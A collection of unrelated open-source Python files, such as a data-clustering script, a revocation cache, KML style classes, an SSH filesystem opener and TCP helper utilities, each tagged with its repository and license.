# cluster yelp and TA data
#
# Rob Churchill
#
# NOTE: IN ORDER TO GET ANY VISUALIZATIONS OUT OF THIS SCRIPT,
# YOU MUST PUT THIS IN AN IPYTHON NOTEBOOK OR SOMETHING SIMILAR
#
# NOTE: I learned to do this in my data science class last semester. If you are looking for plagiarism things, you will almost certainly find similar clustering code.
# I did not copy it, I learned this specific way of doing it, and referred to my previous assignments when doing it for this project. If you would like to see my previous
# assignments, I will provide you them on request. Otherwise, I don't think that it's worth adding a lot of extra files for the sole sake of showing that I haven't plagiarized.
import scipy as sp
import numpy as np
import math
from sklearn.cluster import KMeans
import scipy.cluster.hierarchy as hr
from sklearn.cluster import DBSCAN
import csv
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
folder = 'data/'
file_names = ['yelp_data.csv', 'trip_advisor_data.csv']
yelp_dataset = list()
#change the index of file_names in this line to 0 if you want to cluster yelp, 1 if you want to cluster trip advisor
with open(folder+file_names[1], 'r') as f:
reader = csv.reader(f)
for line in reader:
yelp_dataset.append(line)
# remove headers
yelp_dataset.remove(yelp_dataset[0])
# throw out the fields we don't need so that we have enough memory to cluster such a large dataset
new_yelp_ds = []
for y in yelp_dataset:
local = 0
if y[19] == "TRUE":
local = 1
if y[19] in ["FALSE", "TRUE"]:
for l in range(0, len(y)):
if y[l] == "NA":
y[l] = 0
if int(y[11]) > 99:
# mean_rating, distance
y = [float(y[21]), math.log(float(y[18])+1), math.log(int(y[6])+1)]
new_yelp_ds.append(y)
# this condensed dataset is now our working dataset
yelp_dataset = np.array(new_yelp_ds)
print len(yelp_dataset)
#print np.amax(yelp_dataset[:,1])
# start kmeans. try it with 1...11 clusters to see which is best. for both, it was two.
error = np.zeros(11)
error[0] = 0
for k in range(1,11):
kmeans = KMeans(n_clusters=k)
kmeans.fit_predict(yelp_dataset)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error[k] = kmeans.inertia_
plt.plot(range(1,len(error)),error[1:])
plt.xlabel('Number of clusters')
plt.ylabel('Error')
# run kmeans on the optimal k
kmeans = KMeans(n_clusters=2, n_init=15)
kmeans.fit_predict(yelp_dataset)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error = kmeans.inertia_
print labels
print error
# make it pretty and plot it. kmeans told us literally nothing about this dataset.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# set up dbscan, set the eps based on the website
# for yelp, use 0.25. For trip advisor use 0.5
dbscan = DBSCAN(eps = 0.5)
# run dbscan on the data
dbscan.fit_predict(yelp_dataset)
labels = dbscan.labels_
print labels
# make it pretty and plot it. dbscan highlights some major grouping of reviews in the data,
# especially the local and non-local groups.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# hierarchical clustering is a very memory consuming algorithm, so we can only take a small subset of the dataset
# we randomly permute and take the first 1000.
permutation = np.random.permutation(yelp_dataset)
small_ds = permutation[:1000]
# run the algorithm on our data
Z = hr.linkage(small_ds, method='complete', metric='euclidean')
print Z.shape, small_ds.shape
# plot the dendrogram to see how the clusters were created.
fig = plt.figure(figsize=(10,10))
T = hr.dendrogram(Z,color_threshold=0.4, leaf_font_size=1)
fig.show()
# cluster our data and get the labels for plotting.
labels = hr.fcluster(Z, t=7, depth=8)
#print labels
# make it pretty and plot it. heirarchical clustering, like kmeans, showed us nothing interesting.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('r')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0) | rchurch4/georgetown-data-science-fall-2015 | analysis/clusterings/clustering.py | Python | mit | 4,732 | 0.01585 |
# descriptors.__init__
#
# Expose Descriptor, Validated, and all descriptors so they can be
# imported via "from descriptors import ..."
from __future__ import print_function, unicode_literals, division
from descriptors.Descriptor import Descriptor
from descriptors.Validated import Validated
import descriptors.handmade as hm
import descriptors.massproduced as mm
_all_descriptors = set([
(obj_name, obj)
for module in (hm, mm)
for obj_name, obj in module.__dict__.items()
if obj.__class__.__name__ == "DescriptorMeta"])
_all_descriptors.discard(("Descriptor", Descriptor))
globals().update(_all_descriptors)
| noutenki/descriptors | descriptors/__init__.py | Python | mit | 631 | 0 |
# Copyright 2008 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from webdav.acp.Acl import ACL
from webdav.acp.Ace import ACE
from webdav.acp.GrantDeny import GrantDeny
from webdav.acp.Privilege import Privilege
from webdav.acp.Principal import Principal
__version__ = "$LastChangedRevision: 2 $"
| antont/tundra | src/Application/PythonScriptModule/pymodules_old/lib/webdav/acp/__init__.py | Python | apache-2.0 | 829 | 0 |
from setuptools import setup
setup(
name="mbtapy",
version='0.1.0dev1',
description='Python bindings for the MBTA-REALTIME API (v2)',
author="Joseph Dougherty",
author_email="[email protected]",
url='https://github.com/JDougherty/mbtapy',
install_requires=['requests'],
license='LICENSE',
packages=['mbtapy'],
)
| JDougherty/mbtapy | setup.py | Python | apache-2.0 | 355 | 0.002817 |
# Copyright 2017 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`rev_cache` --- Cache for revocations
==========================================
"""
# Stdlib
import logging
import threading
# External
from prometheus_client import Counter, Gauge
# SCION
from lib.crypto.hash_tree import ConnectedHashTree
# Exported metrics.
REVS_TOTAL = Gauge("rc_revs_total", "# of cached revocations", ["server_id", "isd_as"])
REVS_BYTES = Gauge("rc_revs_bytes", "RevCache memory usage", ["server_id", "isd_as"])
REVS_ADDED = Counter("rc_revs_added_total", "Total revocations added",
["server_id", "isd_as"])
REVS_REMOVED = Counter("rc_revs_removed_total", "Total revocations removed",
["server_id", "isd_as"])
def _mk_key(rev_info):
"""Returns the key for a RevocationInfo object."""
return (rev_info.isd_as(), rev_info.p.ifID)
class RevCache:
"""Thread-safe cache for revocations with auto expiration of entries."""
def __init__(self, capacity=1000, labels=None): # pragma: no cover
"""
:param dict labels:
Labels added to the exported metrics. The following labels are supported:
- server_id: A unique identifier of the server that is exporting
- isd_as: The ISD_AS of where the server is running
- type: A generic label for the type of the revocations.
"""
self._cache = {}
self._lock = threading.RLock()
self._capacity = capacity
self._labels = labels
if self._labels:
self._init_metrics()
def _init_metrics(self): # pragma: no cover
REVS_TOTAL.labels(**self._labels).set(0)
REVS_BYTES.labels(**self._labels).set(0)
REVS_ADDED.labels(**self._labels).inc(0)
REVS_REMOVED.labels(**self._labels).inc(0)
def __contains__(self, rev_info): # pragma: no cover
return self.contains_key(_mk_key(rev_info))
def contains_key(self, key): # pragma: no cover
with self._lock:
stored_info = self._cache.get(key)
return stored_info and self._validate_entry(stored_info)
def __getitem__(self, key): # pragma: no cover
return self.get(key)
def get(self, key, default=None):
with self._lock:
try:
rev_info = self._cache[key]
except KeyError:
return default
if self._validate_entry(rev_info):
return rev_info
return default
def add(self, rev_info):
"""
Adds rev_info to the cache and returns True if the operation succeeds.
"""
if ConnectedHashTree.verify_epoch(rev_info.p.epoch) != ConnectedHashTree.EPOCH_OK:
return False
with self._lock:
key = _mk_key(rev_info)
stored_info = self.get(key)
if not stored_info:
# Try to free up space in case the cache reaches the cap limit.
if len(self._cache) >= self._capacity:
for info in list(self._cache.values()):
self._validate_entry(info)
# Couldn't free up enough space...
if len(self._cache) >= self._capacity:
logging.error("Revocation cache full!.")
return False
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info))
return True
if rev_info.p.epoch > stored_info.p.epoch:
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_REMOVED.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info) - len(stored_info))
return True
return False
def _validate_entry(self, rev_info, cur_epoch=None): # pragma: no cover
"""Removes an expired revocation from the cache."""
if (ConnectedHashTree.verify_epoch(rev_info.p.epoch, cur_epoch) !=
ConnectedHashTree.EPOCH_OK):
del self._cache[_mk_key(rev_info)]
if self._labels:
REVS_REMOVED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).dec()
REVS_BYTES.labels(**self._labels).dec(len(rev_info))
return False
return True
| FR4NK-W/osourced-scion | python/lib/rev_cache.py | Python | apache-2.0 | 5,118 | 0.001172 |
__author__ = 'romilly'
v1 = 1.0
v2 = 1.0
n1 = 1
while v2 > 10e-6:
v2 = v2 / n1
v1 = v1 + v2
n1 = n1 + 1
print v1
| romilly/pegasus-autocode | autocode/firstprog.py | Python | mit | 126 | 0 |
#!/usr/bin/env python3
"""inject_repos.py - CI secret repos injection.
"""
import yaml
from lxml import etree
from lxml.etree import ElementTree as ET
import argparse
from six import iteritems
def main():
repos_file, beaker_file = parse_args()
repos = load_secret_data(repos_file)
inject_repos(repos, beaker_file)
def parse_args():
description_msg = 'Resolve and filter secret data'
parser = argparse.ArgumentParser(description=description_msg)
parser.add_argument(
"-f", "--secret-file", type=str,
help=("Path to secret file.")
)
parser.add_argument(
"-b", "--beaker-file", type=str,
help=("Path to beaker file.")
)
args = parser.parse_args()
return args.secret_file, args.beaker_file
def load_secret_data(file_to_load=None):
"""Load yaml file from a given location
:param str file_to_load: (optional) Path to the file we need to load.
:rtype: list
:returns: A list with the file's data. An empty list if data was not found.
"""
try:
with open(file_to_load, 'r') as sf:
return yaml.safe_load(sf)
except IOError:
return []
def inject_repos(repos, beaker_file):
parser = etree.XMLParser(strip_cdata=False)
tree = etree.parse(beaker_file, parser)
root = tree.getroot()
for repo_name, url in iteritems(repos):
etree.SubElement(root[1][0][4], "repo",
attrib={"name": repo_name, "url": url})
tree.write(
beaker_file, pretty_print=True,
xml_declaration=True, encoding="utf-8"
)
if __name__ == "__main__":
main()
| oVirt/jenkins | stdci_libs/inject_repos.py | Python | gpl-3.0 | 1,611 | 0.003724 |
########################################################################################################################
# VECNet CI - Prototype
# Date: 03/21/2014
# Institution: University of Notre Dame
# Primary Authors:
# Robert Jones <[email protected]>
########################################################################################################################
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseBadRequest
from lib.templatetags.base_extras import set_notification
def download_view(request, file_type=None):
"""
## View for file downloads ##
- Given a file_type, return the file of that type from the scenario in the session.
filetypes = [
'air binary',
'air json',
'humidity binary',
'humidity json',
'land_temp binary',
'land_temp json',
'rainfall binary',
'rainfall json',
'config',
'campaign',
'demographics',
]
"""
if file_type is None:
return HttpResponseBadRequest('No file selected for download.')
if 'scenario' not in request.session.keys():
return HttpResponseBadRequest('No scenario selected to download from.')
try:
my_file = request.session['scenario'].get_file_by_type(file_type)
except ObjectDoesNotExist:
set_notification('alert-error', '<strong>Error!</strong> File does not exist.', request.session)
return HttpResponseBadRequest('Scenario does not contain a file of this type.')
response = HttpResponse(mimetype='text/plain')
response['Content-Disposition'] = 'attachment; filename="%s"' % my_file.file_name
response.write(my_file.content)
return response | vecnet/vnetsource | ts_emod/views/DownloadView.py | Python | mpl-2.0 | 1,812 | 0.004415 |
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
cmdclass = {'build_ext' : build_ext},
ext_modules=[Extension("_snaphu",
sources=["_snaphu.pyx",
"../src/snaphu.c",
"../src/snaphu_solver.c",
"../src/snaphu_util.c",
"../src/snaphu_cost.c",
"../src/snaphu_cs2.c",
"../src/snaphu_io.c",
"../src/snaphu_tile.c"],
include_dirs=['../src'],
extra_compile_args=['-Wstrict-prototypes', ],
language="c")]
)
| bosmanoglu/adore-doris | lib/ext/snaphu-v1.4.2/cython/setup.py | Python | gpl-2.0 | 550 | 0.027273 |
"""
JsonCli: Library for CLI based on JSON
--------------------------------------
+------------------------+-------------+
| This is the JsonCli common library. |
+------------------------+-------------+
"""
import argparse
from collections import OrderedDict
from argcomplete import autocomplete
from botocore import xform_name
type_map = {
'structure': str,
'map': str,
'timestamp': str,
'list': str,
'string': str,
'float': float,
'integer': int,
'long': int,
'boolean': bool,
'double': float,
'blob': str}
class OrderNamespace(argparse.Namespace):
"""
Namespace with Order: from argparse.Namespace
"""
__order__ = OrderedDict()
def __init__(self, **kwargs):
super(OrderNamespace, self).__init__(**kwargs)
def __setattr__(self, attr, value):
if value is not None:
self.__order__[attr] = value
super(OrderNamespace, self).__setattr__(attr, value)
def add_arguments(group, args):
"""
Add Arguments to CLI
"""
for kkk, vvv in args.iteritems():
if 'type' in vvv and vvv['type'] in type_map:
vvv['type'] = type_map[vvv['type']]
if 'help' in vvv and not vvv['help']:
vvv['help'] = argparse.SUPPRESS
changed = xform_name(kkk, "-")
if kkk != changed:
kkk = "-".join(["", changed])
group.add_argument(kkk, **vvv)
return group
def recursive_parser(parser, args):
"""
Recursive CLI Parser
"""
subparser = parser.add_subparsers(help=args.get(
'__help__', ''), dest=args.get('__dest__', ''))
for k, v in args.iteritems():
if k == '__help__' or k == '__dest__':
continue
group = subparser.add_parser(k, help=v.get('help', ''))
for kk, vv in v.iteritems():
if kk == 'Subparsers':
group = recursive_parser(group, vv)
elif kk == 'Arguments':
group = add_arguments(group, vv)
return parser
def parse_args(args):
"""
Create the Command Line Interface
:type args: dict
:param args: describes the command structure for the CLI
"""
parser = argparse.ArgumentParser(description=args.get('Description', ''))
for k, v in args.iteritems():
if k == 'Subparsers':
parser = recursive_parser(parser, v)
elif k == 'Arguments':
parser = add_arguments(parser, v)
autocomplete(parser)
return parser.parse_args(None, OrderNamespace())
# vim: tabstop=4 shiftwidth=4 softtabstop=4
| henrysher/opslib | opslib/icsutils/jsoncli.py | Python | apache-2.0 | 2,568 | 0 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from designate.tests.test_api.test_v2 import ApiV2TestCase
class ApiV2LimitsTest(ApiV2TestCase):
def test_get_limits(self):
response = self.client.get('/limits/')
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('max_zones', response.json)
self.assertIn('max_zone_records', response.json)
self.assertIn('max_zone_recordsets',
response.json)
self.assertIn('max_recordset_records',
response.json)
self.assertIn('min_ttl', response.json)
self.assertIn('max_zone_name_length',
response.json)
self.assertIn('max_recordset_name_length',
response.json)
self.assertIn('max_page_limit',
response.json)
absolutelimits = response.json
self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones'])
self.assertEqual(cfg.CONF.quota_zone_records,
absolutelimits['max_zone_recordsets'])
self.assertEqual(cfg.CONF['service:central'].min_ttl,
absolutelimits['min_ttl'])
self.assertEqual(cfg.CONF['service:central'].max_zone_name_len,
absolutelimits['max_zone_name_length'])
self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len,
absolutelimits['max_recordset_name_length'])
self.assertEqual(cfg.CONF['service:api'].max_limit_v2,
absolutelimits['max_page_limit'])
| grahamhayes/designate | designate/tests/test_api/test_v2/test_limits.py | Python | apache-2.0 | 2,306 | 0 |
def test_connect(client, connect):
"""Connect client triggers client_connect"""
connect()
assert client.triggers['CLIENT_CONNECT'] == 1
def test_ping_pong(client, server, connect, flush):
connect()
server.write("PING :ping-message")
client.send("PONG")
# Protocol doesn't advance until loop flushes
assert not client.triggers["PING"]
assert not server.received
flush()
flush()
# Both should have been received now
assert client.triggers["PING"] == 1
assert server.received == ["PONG"]
| numberoverzero/bottom | tests/integ/test_local.py | Python | mit | 546 | 0 |
# coding: utf-8
from __future__ import unicode_literals
from __future__ import absolute_import
import configparser
import six
from .base import Opener
from .registry import registry
from ..subfs import ClosingSubFS
from ..errors import FSError, CreateFailed
__license__ = "LGPLv2+"
__copyright__ = "Copyright (c) 2017-2021 Martin Larralde"
__author__ = "Martin Larralde <[email protected]>"
__version__ = __version__ = (
__import__("pkg_resources")
.resource_string("fs.sshfs", "_version.txt")
.strip()
.decode("ascii")
)
class SSHOpener(Opener):
protocols = ['ssh']
@staticmethod
def open_fs(fs_url, parse_result, writeable, create, cwd):
from ..sshfs import SSHFS
ssh_host, _, dir_path = parse_result.resource.partition('/')
ssh_host, _, ssh_port = ssh_host.partition(':')
ssh_port = int(ssh_port) if ssh_port.isdigit() else 22
params = configparser.ConfigParser()
params.read_dict({'sshfs':getattr(parse_result, 'params', {})})
ssh_fs = SSHFS(
ssh_host,
user=parse_result.username,
passwd=parse_result.password,
pkey=params.get('sshfs', 'pkey', fallback=None),
timeout=params.getint('sshfs', 'timeout', fallback=10),
port=ssh_port,
keepalive=params.getint('sshfs', 'keepalive', fallback=10),
compress=params.getboolean('sshfs', 'compress', fallback=False),
config_path=\
params.get('sshfs', 'config_path', fallback='~/.ssh/config'),
exec_timeout=params.getint('sshfs', 'timeout', fallback=None),
)
try:
if dir_path:
if create:
ssh_fs.makedirs(dir_path, recreate=True)
return ssh_fs.opendir(dir_path, factory=ClosingSubFS)
else:
return ssh_fs
except Exception as err:
six.raise_from(CreateFailed, err)
registry.install(SSHOpener)
| althonos/fs.sshfs | fs/opener/sshfs.py | Python | lgpl-2.1 | 1,998 | 0.002002 |
"""
Copyright 2011-2014-2012 Kyle Lancaster
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Contact me at [email protected]
"""
from simplekml.base import Kmlable, check
from simplekml.substyle import IconStyle, LabelStyle, LineStyle, PolyStyle, BalloonStyle, ListStyle
class StyleSelector(Kmlable):
"""Abstract style class, extended by :class:`simplekml.Style` and :class:`simplekml.StyleMap`
There are no arguments.
"""
_id = 0
def __init__(self):
super(StyleSelector, self).__init__()
self._id = "stylesel_{0}".format(StyleSelector._id)
StyleSelector._id += 1
@property
def id(self):
"""The id of the style, read-only."""
return self._id
class Style(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(name='A Point')
pnt.coords = [(1.0, 2.0)]
pnt.style.labelstyle.color = simplekml.Color.red # Make the text red
pnt.style.labelstyle.scale = 2 # Make the text twice as big
pnt.style.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png'
kml.save("Style.kml")
"""
def __init__(self,
iconstyle=None,
labelstyle=None,
linestyle=None,
polystyle=None,
balloonstyle=None,
liststyle=None):
super(Style, self).__init__()
self._kml["IconStyle_"] = iconstyle
self._kml["LabelStyle_"] = labelstyle
self._kml["LineStyle_"] = linestyle
self._kml["PolyStyle_"] = polystyle
self._kml["BalloonStyle"] = balloonstyle
self._kml["ListStyle"] = liststyle
def __str__(self):
return '<Style id="{0}">{1}</Style>'.format(self._id, super(Style, self).__str__())
@property
def iconstyle(self):
"""The iconstyle, accepts :class:`simplekml.IconStyle`."""
if self._kml["IconStyle_"] is None:
self._kml["IconStyle_"] = IconStyle()
return self._kml["IconStyle_"]
@iconstyle.setter
@check(IconStyle)
def iconstyle(self, iconstyle):
self._kml["IconStyle_"] = iconstyle
@property
def labelstyle(self):
"""The labelstyle, accepts :class:`simplekml.LabelStyle`."""
if self._kml["LabelStyle_"] is None:
self._kml["LabelStyle_"] = LabelStyle()
return self._kml["LabelStyle_"]
@labelstyle.setter
@check(LabelStyle)
def labelstyle(self, labelstyle):
self._kml["LabelStyle_"] = labelstyle
@property
def linestyle(self):
"""The linestyle, accepts :class:`simplekml.LineStyle`."""
if self._kml["LineStyle_"] is None:
self._kml["LineStyle_"] = LineStyle()
return self._kml["LineStyle_"]
@linestyle.setter
@check(LineStyle)
def linestyle(self, linestyle):
self._kml["LineStyle_"] = linestyle
@property
def polystyle(self):
"""The polystyle, accepts :class:`simplekml.PolyStyle`."""
if self._kml["PolyStyle_"] is None:
self._kml["PolyStyle_"] = PolyStyle()
return self._kml["PolyStyle_"]
@polystyle.setter
@check(PolyStyle)
def polystyle(self, polystyle):
self._kml["PolyStyle_"] = polystyle
@property
def balloonstyle(self):
"""The balloonstyle, accepts :class:`simplekml.BalloonStyle`."""
if self._kml["BalloonStyle"] is None:
self._kml["BalloonStyle"] = BalloonStyle()
return self._kml["BalloonStyle"]
@balloonstyle.setter
@check(BalloonStyle)
def balloonstyle(self, balloonstyle):
self._kml["BalloonStyle"] = balloonstyle
@property
def liststyle(self):
"""The liststyle, accepts :class:`simplekml.ListStyle`."""
if self._kml["ListStyle"] is None:
self._kml["ListStyle"] = ListStyle()
return self._kml["ListStyle"]
@liststyle.setter
@check(ListStyle)
def liststyle(self, liststyle):
self._kml["ListStyle"] = liststyle
class StyleMap(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(coords=[(18.432314,-33.988862)])
pnt.stylemap.normalstyle.labelstyle.color = simplekml.Color.blue
pnt.stylemap.highlightstyle.labelstyle.color = simplekml.Color.red
kml.save("StyleMap.kml")
"""
def __init__(self,
normalstyle=None,
highlightstyle=None):
super(StyleMap, self).__init__()
self._pairnormal = None
self._pairhighlight = None
self.normalstyle = normalstyle
self.highlightstyle = highlightstyle
def __str__(self):
buf = ['<StyleMap id="{0}">'.format(self._id),
super(StyleMap, self).__str__()]
if self._pairnormal is not None:
buf.append("<Pair>")
buf.append("<key>normal</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairnormal._id))
buf.append("</Pair>")
if self._pairhighlight is not None:
buf.append("<Pair>")
buf.append("<key>highlight</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairhighlight._id))
buf.append("</Pair>")
buf.append("</StyleMap>")
return "".join(buf)
@property
def normalstyle(self):
"""The normal :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairnormal is None:
self._pairnormal = Style()
return self._pairnormal
@normalstyle.setter
@check(Style)
def normalstyle(self, normal):
self._pairnormal = normal
@property
def highlightstyle(self):
"""The highlighted :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairhighlight is None:
self._pairhighlight = Style()
return self._pairhighlight
@highlightstyle.setter
@check(Style)
def highlightstyle(self, highlighturl):
self._pairhighlight = highlighturl
| EdFarrell/MilkMachine | src/MilkMachine/simplekml/styleselector.py | Python | gpl-3.0 | 6,912 | 0.002315 |
# Programmer friendly subprocess wrapper.
#
# Author: Peter Odding <[email protected]>
# Last Change: March 2, 2020
# URL: https://executor.readthedocs.io
"""
Miscellaneous TCP networking functionality.
The functionality in this module originated in the :class:`executor.ssh.server`
module with the purpose of facilitating a robust automated test suite for the
:class:`executor.ssh.client` module. While working on SSH tunnel support I
needed similar logic again and I decided to extract this code from the
:class:`executor.ssh.server` module.
"""
# Standard library modules.
import itertools
import logging
import random
import socket
# Modules included in our package.
from executor import ExternalCommand
# External dependencies.
from humanfriendly import Timer, format_timespan
from humanfriendly.terminal.spinners import Spinner
from humanfriendly.text import format, pluralize
from property_manager import (
PropertyManager,
lazy_property,
mutable_property,
required_property,
set_property,
)
# Public identifiers that require documentation.
__all__ = (
'EphemeralPortAllocator',
'EphemeralTCPServer',
'TimeoutError',
'WaitUntilConnected',
'logger',
)
# Initialize a logger.
logger = logging.getLogger(__name__)
class WaitUntilConnected(PropertyManager):
"""Wait for a TCP endpoint to start accepting connections."""
@mutable_property
def connect_timeout(self):
"""The timeout in seconds for individual connection attempts (a number, defaults to 2)."""
return 2
@property
def endpoint(self):
"""A human friendly representation of the TCP endpoint (a string containing a URL)."""
return format("%s://%s:%i", self.scheme, self.hostname, self.port_number)
@mutable_property
def hostname(self):
"""The host name or IP address to connect to (a string, defaults to ``localhost``)."""
return 'localhost'
@property
def is_connected(self):
""":data:`True` if a connection was accepted, :data:`False` otherwise."""
timer = Timer()
logger.debug("Checking whether %s is accepting connections ..", self.endpoint)
try:
socket.create_connection((self.hostname, self.port_number), self.connect_timeout)
logger.debug("Yes %s is accepting connections (took %s).", self.endpoint, timer)
return True
except Exception:
logger.debug("No %s isn't accepting connections (took %s).", self.endpoint, timer)
return False
@required_property
def port_number(self):
"""The port number to connect to (an integer)."""
@mutable_property
def scheme(self):
"""A URL scheme that indicates the purpose of the ephemeral port (a string, defaults to 'tcp')."""
return 'tcp'
@mutable_property
def wait_timeout(self):
"""The timeout in seconds for :func:`wait_until_connected()` (a number, defaults to 30)."""
return 30
def wait_until_connected(self):
"""
Wait until connections are being accepted.
:raises: :exc:`TimeoutError` when the SSH server isn't fast enough to
initialize.
"""
timer = Timer()
with Spinner(timer=timer) as spinner:
while not self.is_connected:
if timer.elapsed_time > self.wait_timeout:
raise TimeoutError(format(
"Failed to establish connection to %s within configured timeout of %s!",
self.endpoint, format_timespan(self.wait_timeout),
))
spinner.step(label="Waiting for %s to accept connections" % self.endpoint)
spinner.sleep()
logger.debug("Waited %s for %s to accept connections.", timer, self.endpoint)
class EphemeralPortAllocator(WaitUntilConnected):
"""
Allocate a free `ephemeral port number`_.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@lazy_property
def port_number(self):
"""A dynamically selected free ephemeral port number (an integer between 49152 and 65535)."""
timer = Timer()
logger.debug("Looking for free ephemeral port number ..")
for i in itertools.count(1):
value = self.ephemeral_port_number
set_property(self, 'port_number', value)
if not self.is_connected:
logger.debug("Found free ephemeral port number %s after %s (took %s).",
value, pluralize(i, "attempt"), timer)
return value
@property
def ephemeral_port_number(self):
"""A random ephemeral port number (an integer between 49152 and 65535)."""
return random.randint(49152, 65535)
class EphemeralTCPServer(ExternalCommand, EphemeralPortAllocator):
"""
Make it easy to launch ephemeral TCP servers.
The :class:`EphemeralTCPServer` class makes it easy to allocate an
`ephemeral port number`_ that is not (yet) in use.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@property
def asynchronous(self):
"""Ephemeral TCP servers always set :attr:`.ExternalCommand.asynchronous` to :data:`True`."""
return True
def start(self, **options):
"""
Start the TCP server and wait for it to start accepting connections.
:param options: Any keyword arguments are passed to the
:func:`~executor.ExternalCommand.start()` method of the
superclass.
:raises: Any exceptions raised by :func:`~executor.ExternalCommand.start()`
and :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`.
If the TCP server doesn't start accepting connections within the
configured timeout (see :attr:`~executor.tcp.WaitUntilConnected.wait_timeout`)
the process will be terminated and the timeout exception is propagated.
"""
if not self.was_started:
logger.debug("Preparing to start %s server ..", self.scheme.upper())
super(EphemeralTCPServer, self).start(**options)
try:
self.wait_until_connected()
except TimeoutError:
self.terminate()
raise
class TimeoutError(Exception):
"""
Raised when a TCP server doesn't start accepting connections quickly enough.
This exception is raised by :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`
when the TCP server doesn't start accepting connections within a reasonable time.
"""
| xolox/python-executor | executor/tcp.py | Python | mit | 6,803 | 0.003675 |
from typing import Any
from argparse import ArgumentParser
from zerver.lib.actions import do_rename_stream
from zerver.lib.str_utils import force_text
from zerver.lib.management import ZulipBaseCommand
from zerver.models import get_stream
import sys
class Command(ZulipBaseCommand):
help = """Change the stream name for a realm."""
def add_arguments(self, parser):
# type: (ArgumentParser) -> None
parser.add_argument('old_name', metavar='<old name>', type=str,
help='name of stream to be renamed')
parser.add_argument('new_name', metavar='<new name>', type=str,
help='new name to rename the stream to')
self.add_realm_args(parser, True)
def handle(self, *args, **options):
# type: (*Any, **str) -> None
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
old_name = options['old_name']
new_name = options['new_name']
encoding = sys.getfilesystemencoding()
stream = get_stream(force_text(old_name, encoding), realm)
do_rename_stream(stream, force_text(new_name, encoding))
| amanharitsh123/zulip | zerver/management/commands/rename_stream.py | Python | apache-2.0 | 1,181 | 0.000847 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
